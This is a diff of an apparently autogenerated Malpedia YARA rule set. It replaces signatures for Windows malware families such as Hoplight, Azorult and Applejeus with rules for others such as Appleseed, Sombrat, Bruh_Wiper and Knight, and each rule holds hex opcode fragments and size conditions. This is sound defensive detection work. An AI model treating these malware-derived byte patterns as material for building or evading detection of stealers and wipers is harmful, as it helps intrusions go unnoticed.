-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8985c8fdffff 83f808 0f84ab090000 83f807 0f8777090000 ff24854fa44000 33c0 }
-		$sequence_1 = { c74518f0944100 50 8d4dc4 e8???????? 68???????? 8d45c4 }
-		$sequence_2 = { 68???????? b9???????? e8???????? c645fc03 33c0 }
-		$sequence_3 = { eb02 33c0 8bbdc8fdffff 6bc009 0fb6bc38e8544100 8bc7 89bdc8fdffff }
-		$sequence_4 = { 8b7508 c7465c48554100 83660800 33ff }
-		$sequence_5 = { c645fc01 33c9 66a3???????? 66390d???????? 8bc6 c705????????07000000 0f44c1 }
-		$sequence_6 = { 88440a34 8b049dd0d14100 c744023801000000 e9???????? ff15???????? 8bf8 }
-		$sequence_7 = { 83e61f c1f805 c1e606 8b0485d0d14100 80643004fd 8b45f8 }
-		$sequence_8 = { 6a01 6a00 f7d8 50 53 ff15???????? 8b8d34ffffff }
-		$sequence_9 = { ff15???????? 837c241001 7507 b101 e8???????? 8b35???????? }
+		$sequence_0 = { 7458 8b8df4feffff 51 ff15???????? c785f0feffff00000000 eb0f 8b95f0feffff }
+		$sequence_1 = { 7510 6a00 68???????? ff15???????? 8945fc 837dfc00 }
+		$sequence_2 = { 83c408 e9???????? 68???????? 8d9538f7ffff 52 e8???????? }
+		$sequence_3 = { 7504 b001 eb4f ebc1 c785ecfeffff00000000 eb0f }
+		$sequence_4 = { 33c0 668945f8 8d4df8 51 }
+		$sequence_5 = { e8???????? 50 8d4d0c e8???????? 50 8b4de4 }
+		$sequence_6 = { ff15???????? 83c410 c78560f6ffff00000000 eb0f 8b8560f6ffff 83c001 }
+		$sequence_7 = { 83c408 85c0 7478 68???????? 8d8538f7ffff 50 }
+		$sequence_8 = { 8b45f4 50 ff15???????? 8945f0 6a00 }
+		$sequence_9 = { 6a01 ff15???????? c78544f6ffff01000000 eb0f 8b8d44f6ffff 83c101 898d44f6ffff }
 
 	condition:
-		7 of them and filesize < 273408
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Hoplight_Auto : FILE
+rule MALPEDIA_Win_Appleseed_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a2aa7245-0542-5f03-ac64-64c8e4dfd14a"
+		id = "2cab059a-3093-5ea8-b4c6-461dc05f5c9c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hoplight_auto.yar#L1-L106"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.appleseed_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "00943ab9210fcdddaf459f640db07e69da7180851bcc89590390e262f5274de2"
+		logic_hash = "7ca6e2559d781302d777182a28464c5fa026ffa48945f1841212525a74a1af82"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102434,30 +102618,32 @@ rule MALPEDIA_Win_Hoplight_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bcf ff15???????? 488d442430 4c8d442440 4533c9 33d2 }
-		$sequence_1 = { 488d942428010000 488d4c2440 e8???????? 488d8c2450010000 e8???????? 488b842450020000 }
-		$sequence_2 = { 0bc1 25ff000000 89842410040000 8b842410040000 83f063 8b8c2414040000 }
-		$sequence_3 = { 4863442420 488b4c2470 8b848138100000 89442424 4863442424 488b4c2448 }
-		$sequence_4 = { 48638c2484040000 486bc910 488d4c0c40 488d942440040000 4889542420 448b8c2454040000 }
-		$sequence_5 = { 4883f8ff 7443 488d542420 488bc8 c744242038020000 ff15???????? }
-		$sequence_6 = { 488b842498000000 48898424a8000000 488b8424c8000000 4889842498000000 488b8424a8000000 8b00 }
-		$sequence_7 = { 81e1ff000000 8bc9 488d15966d0200 33048a 8b4c2428 c1e918 }
+		$sequence_0 = { 4881ecf0010000 48c745d8feffffff 48895810 48897018 488b05???????? }
+		$sequence_1 = { e8???????? 48833d????????00 0f842e020000 488d150c170200 488d4db8 e8???????? 90 }
+		$sequence_2 = { 7367 4863d9 4c8d357a640100 488bfb 83e31f 48c1ff05 }
+		$sequence_3 = { 85c0 74ac 488d15b2e10100 488bcb e8???????? 85c0 7499 }
+		$sequence_4 = { 817d0063736de0 7528 48833d????????00 741e 488d0da9000100 e8???????? }
+		$sequence_5 = { 488bf0 4889442478 4885c0 7506 }
+		$sequence_6 = { 48898540010000 48c745d80f000000 488975d0 c645c000 4d8bce 4533c0 498bd4 }
+		$sequence_7 = { 48833d????????00 0f8404040000 488d1552170200 488d4db8 e8???????? 90 488d55d8 }
+		$sequence_8 = { e9???????? 488d8af0000000 e9???????? 488b8a60000000 e9???????? 488d8a10010000 e9???????? }
+		$sequence_9 = { 488d4b04 4c8d05df770000 418d5216 e8???????? 85c0 0f8544090000 }
 
 	condition:
-		7 of them and filesize < 765952
+		7 of them and filesize < 497664
 }
-rule MALPEDIA_Win_Telb_Auto : FILE
+rule MALPEDIA_Win_Sombrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2c2db826-44da-51b3-a002-12e7b8aba209"
+		id = "0c91fe38-2a08-5223-9951-dfa72ae3e5ad"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.telb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.telb_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sombrat_auto.yar#L1-L152"
 		license_url = "N/A"
-		logic_hash = "0475afe77557694f44f95a279ca9003eacdaca59e84d15417e917ac04b83cab7"
+		logic_hash = "cbad5e11330408439cf135255bf75438d03367a5c47a9504ff97a59c98c52d54"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102471,32 +102657,38 @@ rule MALPEDIA_Win_Telb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89742418 81fefeffff7f 7607 befeffff7f }
-		$sequence_1 = { 89bd38eeffff 33c0 89bd48eeffff 8bbd80efffff }
-		$sequence_2 = { 03048d08e34100 50 ff15???????? 5d c3 8bff 55 }
-		$sequence_3 = { f30f7e4010 668908 8d4c2460 660fd6442470 }
-		$sequence_4 = { ff15???????? 83fe64 7cb2 8b8518eeffff 85c0 0f85b7000000 6a28 }
-		$sequence_5 = { e8???????? 833d????????00 7426 68???????? ba???????? 8d4c2464 e8???????? }
-		$sequence_6 = { 52 51 e8???????? 83c408 8b542444 33c0 c744245800000000 }
-		$sequence_7 = { 6a0d 68???????? 8d8d88efffff e8???????? 83bd0cefffff08 8d85f8eeffff 56 }
-		$sequence_8 = { 83c404 8bc8 c645fc39 e8???????? 8d8d10efffff e8???????? 8d8db8efffff }
-		$sequence_9 = { 6689442438 e8???????? 8d4c2430 e8???????? 8d4c2430 e8???????? }
+		$sequence_0 = { 015f08 33c0 488b4c2470 4833cc }
+		$sequence_1 = { 016b08 488d05dc980500 41b9e7160000 4889442420 }
+		$sequence_2 = { 015f08 488bcf e8???????? 8bf0 }
+		$sequence_3 = { 016b08 33c0 e9???????? 33ff }
+		$sequence_4 = { 015f08 33c0 e9???????? 488b4760 }
+		$sequence_5 = { 015f08 83bfd800000016 0f856c020000 488b87c8000000 }
+		$sequence_6 = { 01448c20 48ffc1 493bc9 7cf1 }
+		$sequence_7 = { 0145f1 4533c9 4533c0 488b16 }
+		$sequence_8 = { 014114 8b7508 837df800 8b5df4 0f84c3feffff }
+		$sequence_9 = { 014620 ff36 114e24 8b442434 }
+		$sequence_10 = { 0144244a 894e0c ffb72c010000 ff15???????? }
+		$sequence_11 = { 0145e4 8b55f8 83c40c 294644 }
+		$sequence_12 = { 0000 e8???????? c70424???????? 8d5f0c }
+		$sequence_13 = { 01041e 8b4508 42 8d7308 }
+		$sequence_14 = { 014620 f6460c04 8945e0 742d 85c0 7429 8b4de4 }
+		$sequence_15 = { 014648 d3eb 018ec81b0000 c746044c3f0000 837df000 0f8461020000 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 1466368
 }
-rule MALPEDIA_Win_Tuoni_Auto : FILE
+rule MALPEDIA_Win_Ironhalo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "04148cf8-207a-5f06-9dd5-362667335e9a"
+		id = "b2edd4d8-243a-5455-b301-d36fe2c3ed3d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tuoni"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tuoni_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ironhalo_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "21517c25b667838bd9ce6eb05310b526a84de45e68772e4427c4bd14266f2821"
+		logic_hash = "3a1ed5f7cc69a5a02f4dcd285f3d5642f43e5c8d6d88cc34ecaa1d07c458876f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102510,32 +102702,32 @@ rule MALPEDIA_Win_Tuoni_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? ffb5a4fbffff ffd6 6a08 8d85a8fbffff 50 ff15???????? }
-		$sequence_1 = { 8d4da8 e8???????? 8d4dc0 e8???????? e9???????? 68???????? e8???????? }
-		$sequence_2 = { 8bf8 85ff 7423 8d45e8 50 8d8598fbffff 50 }
-		$sequence_3 = { 89412c 894130 8bc1 c3 83790400 740c 6a18 }
-		$sequence_4 = { 51 ff37 e8???????? 59 59 5e 892f }
-		$sequence_5 = { ff15???????? 50 6a00 57 ff15???????? 8bf8 85ff }
-		$sequence_6 = { 7404 c645d701 f6c302 740b 8d4da4 83e3fd }
-		$sequence_7 = { 8d85a0fbffff 50 ffd7 ff15???????? 50 6a00 6800040000 }
-		$sequence_8 = { 894598 8b452c 894590 8b4530 894594 6a44 5f }
-		$sequence_9 = { 68???????? e8???????? 83c40c 8d4dd8 e8???????? 8d8594fbffff 50 }
+		$sequence_0 = { 8bd0 c1f905 83e21f 8b0c8d60e04000 f644d10401 7425 }
+		$sequence_1 = { 52 50 e8???????? 8d0476 83c408 8d0480 }
+		$sequence_2 = { 81c420430000 c3 8b8c2438430000 6a00 6800000084 6a00 }
+		$sequence_3 = { eb02 33c0 0fbe84c12c914000 c1f804 }
+		$sequence_4 = { 83651003 8bf0 750b c1e602 8b86b0c74000 }
+		$sequence_5 = { 8d0480 c1e005 50 ffd7 }
+		$sequence_6 = { b90a000000 33c0 8d7c2438 885c1410 f3ab }
+		$sequence_7 = { 8bc2 8bf2 c1f805 83e61f 8b048560e04000 8b04f0 83f8ff }
+		$sequence_8 = { 8d942428010000 f3ab b941000000 8d7c2424 f3ab }
+		$sequence_9 = { c744246801010000 ff15???????? 8b442408 8b35???????? }
 
 	condition:
-		7 of them and filesize < 734208
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Equationdrug_Auto : FILE
+rule MALPEDIA_Win_Blackpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3c043b62-e6cf-528c-b34b-4fab7307ccc3"
+		id = "89c6782b-ce89-5ae6-b33e-9ad6b6b135a4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.equationdrug_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackpos_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "bfe71e1dede0b483002d6bdc1803bedc3b70169ecaeef47717be14607c4ca6a2"
+		logic_hash = "7d2d90e306d11c41271f7c0e9630f3392beaf89b6698e039f543a5fdf586b172"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102549,32 +102741,32 @@ rule MALPEDIA_Win_Equationdrug_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4c241c 81e6ffff0000 8b11 ff5214 8b4c2418 668bd0 8b442414 }
-		$sequence_1 = { 8911 8bd4 894104 66896908 8bcf 8b01 8902 }
-		$sequence_2 = { 89742418 3bc2 0f8731020000 6683ff01 0f8227020000 668b44246a 663dffff }
-		$sequence_3 = { c21400 8b17 6a02 8bcf ff523c 85c0 750c }
-		$sequence_4 = { 56 57 8bbc248c000000 57 55 50 }
-		$sequence_5 = { 6a44 e8???????? 83c404 89442464 3bc3 c644245c02 740b }
-		$sequence_6 = { eb02 33c0 50 8bcb c7442424ffffffff e8???????? }
-		$sequence_7 = { 83c424 c21000 8b4c2414 85c9 7406 8b01 6a01 }
-		$sequence_8 = { 8bf0 c68424cc00000001 e8???????? 8d8c2484000000 889c24cc000000 e8???????? 8d4c240c }
-		$sequence_9 = { ff502c 85c0 750d 5f b800090000 5e 83c410 }
+		$sequence_0 = { 40 50 ffd6 85c0 7507 e8???????? eb27 }
+		$sequence_1 = { 46 83bddcfbffff1e 0f8c44ffffff 807d2000 754a }
+		$sequence_2 = { 80f920 7205 80f97f 7204 c6041021 }
+		$sequence_3 = { 8bec 81ec48040000 a1???????? 33c5 8945fc 8b450c 8985ccfbffff }
+		$sequence_4 = { c745c021282a28 c745c44d4d4d4d c745c84d4d4d4d c745cc4d4d4d4d c745d04d4d4d4d c745d44d4d4d4d }
+		$sequence_5 = { 50 8d85b8f4ffff 50 53 6800000008 6a01 53 }
+		$sequence_6 = { bf???????? 833cf544ee410001 751d 8d04f540ee4100 8938 68a00f0000 ff30 }
+		$sequence_7 = { 3bc6 0f848e000000 68b80b0000 6a01 56 }
+		$sequence_8 = { 8bf8 897dd4 8b5dd0 ebab c745e42c824100 817de438824100 7311 }
+		$sequence_9 = { 7e33 89b5b4f4ffff 6a14 8d45bc 50 }
 
 	condition:
-		7 of them and filesize < 449536
+		7 of them and filesize < 3293184
 }
-rule MALPEDIA_Win_Atharvan_Auto : FILE
+rule MALPEDIA_Win_Bruh_Wiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3c02a0c3-381c-58dd-b6d4-bea79ed0706c"
+		id = "8004678f-c7f1-56db-b368-30e9334ba4b0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atharvan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atharvan_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bruh_wiper_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "0acd4bed1957d388586b468893d24540b89fb41ef5b3efe72287a455a5c18d66"
+		logic_hash = "26b32a2c0d923fc99fb91e4beb18e36e72d9c523fef8bdb0bb63ddd5fd11ff5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102588,32 +102780,32 @@ rule MALPEDIA_Win_Atharvan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d4c2460 ff15???????? 0f57c0 488d9540020000 33c0 4533c9 48894598 }
-		$sequence_1 = { 4883c004 413bd0 7cf0 8bcf ff15???????? e9???????? }
-		$sequence_2 = { 488945f0 488d4588 4889442448 488d45a0 4889442440 }
-		$sequence_3 = { 0f8403010000 488d050eea0000 4a8b04e8 42385cf838 0f8ded000000 e8???????? 488b8890000000 }
-		$sequence_4 = { 4883ec20 84c9 752f 488d1d3f380100 488b0b 4885c9 7410 }
-		$sequence_5 = { 0fb602 84c0 75f1 488d0df2360200 ff15???????? 488bd8 }
-		$sequence_6 = { 0fb601 84c0 75f1 488d542430 488d4d60 e8???????? 488bd8 }
-		$sequence_7 = { 488bce e8???????? eb1a 0fb6d1 c7862002000001000000 488bce 4c8d442451 }
-		$sequence_8 = { 488d4da0 41b804010000 e8???????? 4d8bc4 488d8db0000000 ba04010000 }
-		$sequence_9 = { 488945ff 488d05a0b60000 4889450f 488d05a5b60000 48895507 }
+		$sequence_0 = { e8???????? 83c40c be01080000 0f1f8000000000 }
+		$sequence_1 = { 83ee01 75e3 8b4dfc 5f 5e }
+		$sequence_2 = { 8d45f4 57 50 ff15???????? ff15???????? }
+		$sequence_3 = { 68b40200c0 ffd6 8b4dfc 5f 33cd 5e }
+		$sequence_4 = { 6a00 8d85f8fdffff 50 6800020000 8d85fcfdffff 50 }
+		$sequence_5 = { 68???????? 57 ffd3 6800020000 8d85fcfdffff 6a00 }
+		$sequence_6 = { 50 ffd6 8bf0 8d45fb 50 6a00 6a01 }
+		$sequence_7 = { 6800200000 68???????? 57 ffd3 6800020000 8d85fcfdffff }
+		$sequence_8 = { e8???????? 83c40c be01080000 0f1f8000000000 6a00 }
+		$sequence_9 = { 50 ffd6 68???????? 68???????? 8bf8 }
 
 	condition:
-		7 of them and filesize < 348160
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Azorult_Auto : FILE
+rule MALPEDIA_Win_Chiser_Client_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "78ceafa4-342d-5f15-9b14-b1abd4927873"
+		id = "f565e008-ef7c-5843-a15a-c3b17611be9c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.azorult_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chiser_client"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chiser_client_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "41a9a9a645aa649d01575fa1735f856598b52bd5cebd3453810c05cbd7a89f47"
+		logic_hash = "4cf569331733e568f50794a1dc9bdd96595cb2c255defe55202f75e9deeee12b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102627,38 +102819,32 @@ rule MALPEDIA_Win_Azorult_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45e8 b102 e8???????? 8d55e8 8d45dc e8???????? 8b45dc }
-		$sequence_1 = { 03d8 8d45f8 50 8b45f8 e8???????? }
-		$sequence_2 = { 57 55 bb???????? be???????? bf???????? 807b2800 }
-		$sequence_3 = { e8???????? 33c0 55 68???????? 64ff30 648920 8d859cfdffff }
-		$sequence_4 = { 2bc3 2bc7 8bf8 85ff 7d02 }
-		$sequence_5 = { 8d145f 8b442404 e8???????? 8b0424 8bd7 e8???????? }
-		$sequence_6 = { 8d8570fdffff e8???????? 8d8574fdffff ba02000000 }
-		$sequence_7 = { 8d8584fdffff ba04000000 e8???????? 8b8584fdffff }
-		$sequence_8 = { 7506 ff05???????? 56 e8???????? }
-		$sequence_9 = { 53 e8???????? 59 56 e8???????? 59 8bc7 }
-		$sequence_10 = { e8???????? 59 8b45f4 40 }
-		$sequence_11 = { 50 e8???????? 59 8bd8 33c0 }
-		$sequence_12 = { 85db 7404 8bc3 eb07 }
-		$sequence_13 = { 011f 59 8bc3 c1e003 01866caf0100 }
-		$sequence_14 = { 014f18 8b4714 85c0 0f854e010000 }
-		$sequence_15 = { 014110 5f 5e 5b }
+		$sequence_0 = { 48895c2408 48896c2410 4889742418 48897c2420 4156 0fb605???????? 488d7222 }
+		$sequence_1 = { 4d8bf0 4c8bfa 488bf9 488b5908 48895c2448 488bcb e8???????? }
+		$sequence_2 = { 8364242800 488d05e895feff 4889442430 488d4c2420 e8???????? 4c396b08 }
+		$sequence_3 = { 48894a08 488d4808 e8???????? 488d055da00100 488903 }
+		$sequence_4 = { c705????????090400c0 c705????????01000000 c705????????01000000 b808000000 486bc000 488d0dae5e0400 }
+		$sequence_5 = { e8???????? b876000000 668945b7 488d55b7 488d4dd7 e8???????? b861000000 }
+		$sequence_6 = { c7452700000000 e8???????? 4889451f 488d05d0e20100 48894517 4883653700 c6454700 }
+		$sequence_7 = { 488b4c2478 4885c9 740b ff15???????? 4c89742478 488b4d88 4885c9 }
+		$sequence_8 = { 4c8d0d82ac0200 8bda 4c8d0571ac0200 488bf9 488d15c7a60200 b908000000 }
+		$sequence_9 = { 4883ec20 488bd9 488bc2 488d0dd9150200 48890b 488d5308 33c9 }
 
 	condition:
-		7 of them and filesize < 1753088
+		7 of them and filesize < 714752
 }
-rule MALPEDIA_Win_Aytoke_Auto : FILE
+rule MALPEDIA_Win_Darkme_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b5ab25e2-4341-5ae9-b651-f00d8ee54d3c"
+		id = "48faa238-7c8d-58c0-88b3-9aef8ec2075d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aytoke_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkme_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "fd830f88f9db36bca6c8ff77c03edf20db894b0cd51609c00e9abcdd21defeac"
+		logic_hash = "3cf45d3e46e2f9013414d4d68a45acd13e79993e633a174a46aa5a37d07153ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102672,32 +102858,32 @@ rule MALPEDIA_Win_Aytoke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75e9 e9???????? 33c0 8bff 0fb78874374100 66898c05fcfdffff }
-		$sequence_1 = { 83feff 751a ff15???????? 50 68???????? e8???????? }
-		$sequence_2 = { 83c204 83c404 3bd6 7c1b 90 }
-		$sequence_3 = { e9???????? 33c0 8bff 0fb788343a4100 66898c05fcfdffff 83c002 }
-		$sequence_4 = { 8d0cbd00c44100 8901 8305????????20 8b11 }
-		$sequence_5 = { c1e106 030c9d00c44100 eb02 8bca f641247f 7525 }
-		$sequence_6 = { be???????? 8d7de0 f3a5 50 }
-		$sequence_7 = { b32a 3bc8 7c0e 389850744100 7501 42 40 }
-		$sequence_8 = { e8???????? 0fb60d???????? 51 8d55d4 52 68???????? 8d85f8f9ffff }
-		$sequence_9 = { 46 eb18 b801000000 3bc8 7c0f 3b1485989c4100 7501 }
+		$sequence_0 = { 66c745b40000 8b4dd0 894d88 c745d000000000 8d55b4 52 8b45d8 }
+		$sequence_1 = { c745f8???????? c745fc00000000 8b7508 8b06 56 ff5004 8b7d0c }
+		$sequence_2 = { 89856cffffff c78564ffffff08000000 8d8564ffffff 50 8b4d08 83c134 51 }
+		$sequence_3 = { 8b4ddc 51 e8???????? 898520ffffff ff15???????? 8b55bc 52 }
+		$sequence_4 = { ff15???????? 898520ffffff 8d4dbc 51 8b9520ffffff 8b02 }
+		$sequence_5 = { 8b85ecfeffff 50 ff15???????? 89856cfeffff eb0a c7856cfeffff00000000 8d8d7cffffff }
+		$sequence_6 = { ff15???????? 8945d0 c745c808000000 8d4dc8 51 8b5508 }
+		$sequence_7 = { 68???????? ff15???????? 898574ffffff c745fc01000000 c745fc02000000 6aff ff15???????? }
+		$sequence_8 = { eb0a c78558feffff00000000 8d459c 50 8d4da0 51 }
+		$sequence_9 = { 8d55b0 52 8d4590 50 ffd6 50 8d8d10ffffff }
 
 	condition:
-		7 of them and filesize < 425984
+		7 of them and filesize < 1515520
 }
-rule MALPEDIA_Win_Applejeus_Auto : FILE
+rule MALPEDIA_Win_Knight_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a96317b4-bd12-5fff-be15-1f3be0768b07"
+		id = "a5e09115-4011-54e1-a2ba-c2bbb8ab355a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.applejeus_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.knight"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.knight_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c4add26ff07d848a7e42bd144b883577737cbad9e67d1f7f5e019bb64cfa0808"
+		logic_hash = "d7c3e295d686febfc6f312c8c39590a584a2b1ffbd1bc0f76a009284be0570bc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102711,32 +102897,32 @@ rule MALPEDIA_Win_Applejeus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8885b3fbffff 8b8598fbffff 0418 83f059 8885b4fbffff 8b8598fbffff 0419 }
-		$sequence_1 = { 8b0f 8901 ffd6 8b4f04 0f57c0 660fd645e0 c745e000000000 }
-		$sequence_2 = { 8bce ff10 6a04 56 e8???????? 6a04 ff7598 }
-		$sequence_3 = { 8b85e4edffff c645fc0b 8b7f28 89bd40eeffff 8dbdf0efffff 8b7024 8b5020 }
-		$sequence_4 = { c685a1e7ffff43 c685a2e7ffff52 c685a3e7ffff66 8a8570e7ffff c685a4e7ffff00 0f1f4000 }
-		$sequence_5 = { 042f 83f06c 88852ffeffff 8b85fcfdffff 0430 83f04d 888530feffff }
-		$sequence_6 = { ffd3 8b4d08 83c410 894104 8b450c 5f 5e }
-		$sequence_7 = { 8955c4 8b461c 8945d0 e8???????? 0f1045bc 8b4dd8 83c408 }
-		$sequence_8 = { e8???????? 50 8d4de0 e8???????? 8d45e0 50 8d8d9cfeffff }
-		$sequence_9 = { 8885c9f6ffff 8b8560f6ffff 0466 83f053 8885caf6ffff 8b8560f6ffff 0467 }
+		$sequence_0 = { e8???????? 4889842438040000 48895c2438 488d05b7dc2b00 e8???????? 488b4c2468 48894808 }
+		$sequence_1 = { c3 4889b4fa90100000 4c8984fa98100000 48ffc0 48398280100000 0f8e41020000 488d3440 }
+		$sequence_2 = { e8???????? 90 48badc5618b3c5c35016 48899424d0010000 48bac41447e86e4d2c6e 48899424d8010000 48ba681b6b8416537508 }
+		$sequence_3 = { eb11 488d7818 488b8c2490180000 e8???????? 488b8c24f8090000 48894808 833d????????00 }
+		$sequence_4 = { 90 e9???????? 4d89e0 e8???????? e9???????? 0fb6542447 488b4c2470 }
+		$sequence_5 = { e8???????? e9???????? 488b15???????? 83ba40010000ff 7524 488b942420010000 488d3452 }
+		$sequence_6 = { e8???????? 488b842460010000 e8???????? 48898c24f0000000 48897c2468 488b942418010000 488d7208 }
+		$sequence_7 = { 48badde48c2f452788e5 488954247e 48ba44246115b6572ab9 4889942486000000 31c0 e9???????? 48894c2450 }
+		$sequence_8 = { 48baa24a6d7998292bba 488954242b 48ba58053529bf406a5d 4889542433 31c0 eb14 0fb654043b }
+		$sequence_9 = { e8???????? 488d0542873200 bb14000000 6690 e8???????? 31c0 4889c1 }
 
 	condition:
-		7 of them and filesize < 1245184
+		7 of them and filesize < 12149760
 }
-rule MALPEDIA_Win_Deputydog_Auto : FILE
+rule MALPEDIA_Win_Headertip_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3df82804-d079-5fb4-95b9-354c74dddd14"
+		id = "106ff000-576d-5d0d-a598-b9503a4cb801"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deputydog_auto.yar#L1-L126"
